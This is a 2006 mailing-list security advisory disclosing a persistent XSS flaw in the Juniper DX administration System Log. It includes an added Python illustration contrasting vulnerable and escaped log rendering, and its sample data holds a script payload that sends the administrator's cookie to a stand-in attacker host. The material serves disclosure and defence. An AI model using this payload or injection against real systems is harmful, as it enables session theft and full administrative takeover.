Message-ID: <26563eca0607100916y7c87aeehe778996722abd0c5@mail.gmail.com>
Date: Mon, 10 Jul 2006 12:16:09 -0400
From: "Darren Bounds" <dbounds@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Juniper Networks DX Web Administration Persistent System Log XSS Vulnerability


Juniper Networks DX Web Administration Persistent System Log XSS Vulnerability
July 10, 2006

Product Overview:
The Juniper Networks (Redline) DX application acceleration platform
delivers a complete data center acceleration solution for web-enabled
and IP-based business applications.

Vulnerability Details:
The Juniper Networks DX System log is vulnerable to a persistent,
unauthenticated XSS attack. This vulnerability can be exploited by an
attacker to obtain full administrative access to the Juniper DX appliance.

This vulnerability stems from a failure to sanitize System Log content
before it is rendered in the web administration interface. A malicious
user may insert script content into the username field of the login form;
that content is recorded in the System Log and is then executed in the
browser of any administrative user who views the System Log.
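The following is an added illustration of the flaw class described above, not code from the advisory or from the Juniper DX product. The log entry format, the "login failed" event text, and the attacker.example host are constructed for the example. It contrasts a log viewer that writes the attacker-controlled username into the administrator's page verbatim with one that HTML-escapes every field at output time:

```python
import html
import re

# Constructed sample log entries modelling a failed-login audit trail.
# The username field is attacker-controlled: it is whatever was typed into
# the login form, so it reaches the log without any authentication.
SAMPLE_LOG = [
    ("2006-07-10 12:16:09", "login failed", "admin"),
    ("2006-07-10 12:16:31", "login failed",
     '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'),
]


def render_log_vulnerable(entries):
    """Mirror the flaw described in the advisory: log fields are written into
    the admin page verbatim, so a script tag stored in the username column
    executes in the administrator's browser when the System Log is viewed."""
    rows = "".join(
        f"<tr><td>{ts}</td><td>{event}</td><td>{user}</td></tr>"
        for ts, event, user in entries
    )
    return f"<table>{rows}</table>"


def render_log_hardened(entries):
    """Fixed version: every log field is HTML-escaped at output time, so the
    payload is displayed as text rather than interpreted as markup."""
    rows = "".join(
        "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
            html.escape(ts, quote=True),
            html.escape(event, quote=True),
            html.escape(user, quote=True),
        )
        for ts, event, user in entries
    )
    return f"<table>{rows}</table>"


_SCRIPT_TAG_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_active_script(rendered_html):
    """Coarse check used here only to show the difference between the two
    renderers: does the output contain an unescaped <script> tag?"""
    return bool(_SCRIPT_TAG_RE.search(rendered_html))


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_log_vulnerable),
                           ("hardened", render_log_hardened)):
        page = renderer(SAMPLE_LOG)
        print(f"{name}: active script in admin page = {contains_active_script(page)}")
```

The point of the example is that the injection point and the execution point are different pages: the attacker only needs to reach the login form, while the script runs with the privileges of the administrator who later opens the log viewer, which is what makes the issue both unauthenticated and persistent. Escaping has to be applied for the output context in which the field is rendered (element body here; attribute or JavaScript contexts need their own encoding), and it belongs at render time rather than at log-write time, since the log itself should record exactly what the client sent.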

Affected Versions:
Juniper DX 5.1.x
Older versions may also be affected.

Workarounds:
Control network access to the DX web administration console.

References:
http://www.juniper.net/products/appaccel/dca/dx.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

